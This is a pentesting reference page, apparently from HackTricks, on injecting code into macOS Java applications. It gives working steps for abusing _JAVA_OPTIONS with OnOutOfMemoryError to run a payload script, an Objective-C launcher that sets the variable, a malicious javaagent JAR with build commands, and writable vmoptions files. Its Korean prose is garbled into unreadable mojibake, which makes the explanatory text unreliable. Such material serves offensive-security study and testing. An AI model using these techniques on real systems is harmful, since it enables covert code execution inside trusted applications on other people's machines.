HackTricks
macOS Java Applications Injection
Tip
AWS ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks μ§μνκΈ°
- ꡬλ κ³ν νμΈνκΈ°!
- **π¬ λμ€μ½λ κ·Έλ£Ή λλ ν λ κ·Έλ¨ κ·Έλ£Ήμ μ°Έμ¬νκ±°λ νΈμν° π¦ @hacktricks_liveλ₯Ό νλ‘μ°νμΈμ.
- HackTricks λ° HackTricks Cloud κΉνλΈ λ¦¬ν¬μ§ν 리μ PRμ μ μΆνμ¬ ν΄νΉ νΈλ¦μ 곡μ νμΈμ.
Enumeration
μμ€ν
μ μ€μΉλ Java μ ν리μΌμ΄μ
μ μ°Ύμ΅λλ€. Info.plistμ μλ Java μ±μ java. λ¬Έμμ΄μ ν¬ν¨νλ μΌλΆ Java 맀κ°λ³μλ₯Ό ν¬ν¨νλ κ²μΌλ‘ νμΈλμμ΅λλ€. λ°λΌμ μ΄λ₯Ό κ²μν μ μμ΅λλ€:
# Search only in /Applications folder
sudo find /Applications -name 'Info.plist' -exec grep -l "java\." {} \; 2>/dev/null
# Full search
sudo find / -name 'Info.plist' -exec grep -l "java\." {} \; 2>/dev/null
_JAVA_OPTIONS
νκ²½ λ³μ **_JAVA_OPTIONS**λ μλ°λ‘ μ»΄νμΌλ μ±μ μ€νμ μμμ μλ° λ§€κ°λ³μλ₯Ό μ£Όμ
νλ λ° μ¬μ©ν μ μμ΅λλ€:
# Write your payload in a script called /tmp/payload.sh
export _JAVA_OPTIONS='-Xms2m -Xmx5m -XX:OnOutOfMemoryError="/tmp/payload.sh"'
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
νμ¬ ν°λ―Έλμ μμμΌλ‘ μ€ννμ§ μκ³ μλ‘μ΄ νλ‘μΈμ€λ‘ μ€ννλ €λ©΄ λ€μμ μ¬μ©ν μ μμ΅λλ€:
#import <Foundation/Foundation.h>
// clang -fobjc-arc -framework Foundation invoker.m -o invoker
int main(int argc, const char * argv[]) {
@autoreleasepool {
// Specify the file path and content
NSString *filePath = @"/tmp/payload.sh";
NSString *content = @"#!/bin/bash\n/Applications/iTerm.app/Contents/MacOS/iTerm2";
NSError *error = nil;
// Write content to the file
BOOL success = [content writeToFile:filePath
atomically:YES
encoding:NSUTF8StringEncoding
error:&error];
if (!success) {
NSLog(@"Error writing file at %@\n%@", filePath, [error localizedDescription]);
return 1;
}
NSLog(@"File written successfully to %@", filePath);
// Create a new task
NSTask *task = [[NSTask alloc] init];
/// Set the task's launch path to use the 'open' command
[task setLaunchPath:@"/usr/bin/open"];
// Arguments for the 'open' command, specifying the path to Android Studio
[task setArguments:@[@"/Applications/Android Studio.app"]];
// Define custom environment variables
NSDictionary *customEnvironment = @{
@"_JAVA_OPTIONS": @"-Xms2m -Xmx5m -XX:OnOutOfMemoryError=/tmp/payload.sh"
};
// Get the current environment and merge it with custom variables
NSMutableDictionary *environment = [NSMutableDictionary dictionaryWithDictionary:[[NSProcessInfo processInfo] environment]];
[environment addEntriesFromDictionary:customEnvironment];
// Set the task's environment
[task setEnvironment:environment];
// Launch the task
[task launch];
}
return 0;
}
κ·Έλ¬λ, μ΄λ μ€νλ μ±μμ μ€λ₯λ₯Ό λ°μμν¬ κ²μ΄λ©°, λ μλ°ν λ°©λ²μ μλ° μμ΄μ νΈλ₯Ό μμ±νκ³ μ¬μ©νλ κ²μ λλ€:
export _JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
# Or
open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Professional"
Caution
μμ΄μ νΈλ₯Ό λ€λ₯Έ Java λ²μ μΌλ‘ μμ±νλ©΄ μμ΄μ νΈμ μ ν리μΌμ΄μ λͺ¨λμ μ€νμ΄ μ€λ¨λ μ μμ΅λλ€.
μμ΄μ νΈλ λ€μκ³Ό κ°μ μ μμ΅λλ€:
import java.io.*;
import java.lang.instrument.*;
public class Agent {
public static void premain(String args, Instrumentation inst) {
try {
String[] commands = new String[] { "/usr/bin/open", "-a", "Calculator" };
Runtime.getRuntime().exec(commands);
}
catch (Exception err) {
err.printStackTrace();
}
}
}
μμ΄μ νΈλ₯Ό μ»΄νμΌνλ €λ©΄ λ€μμ μ€ννμμμ€:
javac Agent.java # Create Agent.class
jar cvfm Agent.jar manifest.txt Agent.class # Create Agent.jar
manifest.txt:
Premain-Class: Agent
Agent-Class: Agent
Can-Redefine-Classes: true
Can-Retransform-Classes: true
κ·Έλ¦¬κ³ νκ²½ λ³μλ₯Ό λ΄λ³΄λΈ ν λ€μκ³Ό κ°μ΄ Java μ ν리μΌμ΄μ μ μ€νν©λλ€:
export _JAVA_OPTIONS='-javaagent:/tmp/j/Agent.jar'
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
# Or
open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Professional"
vmoptions νμΌ
μ΄ νμΌμ Javaκ° μ€νλ λ Java 맀κ°λ³μμ μ§μ μ μ§μν©λλ€. μ΄μ μ λͺ κ°μ§ νΈλ¦μ μ¬μ©νμ¬ java 맀κ°λ³μλ₯Ό λ³κ²½νκ³ νλ‘μΈμ€κ° μμμ λͺ
λ Ήμ μ€ννλλ‘ λ§λ€ μ μμ΅λλ€.
κ²λ€κ°, μ΄ νμΌμ include λλ ν 리λ₯Ό μ¬μ©νμ¬ λ€λ₯Έ νμΌμ ν¬ν¨ν μ μμΌλ―λ‘ ν¬ν¨λ νμΌμ λ³κ²½ν μλ μμ΅λλ€.
λμ±μ΄, μΌλΆ Java μ±μ νλ μ΄μμ vmoptions νμΌμ λ‘λν©λλ€.
Android Studioμ κ°μ μΌλΆ μ ν리μΌμ΄μ μ μ΄λ¬ν νμΌμ μ°Ύκ³ μλ μΆλ ₯ μμΉλ₯Ό νμν©λλ€.
/Applications/Android\ Studio.app/Contents/MacOS/studio 2>&1 | grep vmoptions
2023-12-13 19:53:23.920 studio[74913:581359] fullFileName is: /Applications/Android Studio.app/Contents/bin/studio.vmoptions
2023-12-13 19:53:23.920 studio[74913:581359] fullFileName exists: /Applications/Android Studio.app/Contents/bin/studio.vmoptions
2023-12-13 19:53:23.920 studio[74913:581359] parseVMOptions: /Applications/Android Studio.app/Contents/bin/studio.vmoptions
2023-12-13 19:53:23.921 studio[74913:581359] parseVMOptions: /Applications/Android Studio.app.vmoptions
2023-12-13 19:53:23.922 studio[74913:581359] parseVMOptions: /Users/carlospolop/Library/Application Support/Google/AndroidStudio2022.3/studio.vmoptions
2023-12-13 19:53:23.923 studio[74913:581359] parseVMOptions: platform=20 user=1 file=/Users/carlospolop/Library/Application Support/Google/AndroidStudio2022.3/studio.vmoptions
κ·Έλ€μ΄ κ·Έλ μ§ μλ€λ©΄, λ€μμ μ¬μ©νμ¬ μ½κ² νμΈν μ μμ΅λλ€:
# Monitor
sudo eslogger lookup | grep vmoption # Give FDA to the Terminal
# Launch the Java app
/Applications/Android\ Studio.app/Contents/MacOS/studio
μλλ‘μ΄λ μ€νλμ€κ° μ΄ μμ μμ /Applications/Android Studio.app.vmoptions νμΌμ λ‘λνλ €κ³ μλνλ κ²μ΄ μΌλ§λ ν₯λ―Έλ‘μ΄μ§ μ£Όλͺ©νμΈμ. μ΄κ³³μ admin κ·Έλ£Ήμ λͺ¨λ μ¬μ©μκ° μ°κΈ° κΆνμ κ°μ§ μ₯μμ
λλ€.
Tip
AWS ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:
GCP ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:HackTricks μ§μνκΈ°
- ꡬλ κ³ν νμΈνκΈ°!
- **π¬ λμ€μ½λ κ·Έλ£Ή λλ ν λ κ·Έλ¨ κ·Έλ£Ήμ μ°Έμ¬νκ±°λ νΈμν° π¦ @hacktricks_liveλ₯Ό νλ‘μ°νμΈμ.
- HackTricks λ° HackTricks Cloud κΉνλΈ λ¦¬ν¬μ§ν 리μ PRμ μ μΆνμ¬ ν΄νΉ νΈλ¦μ 곡μ νμΈμ.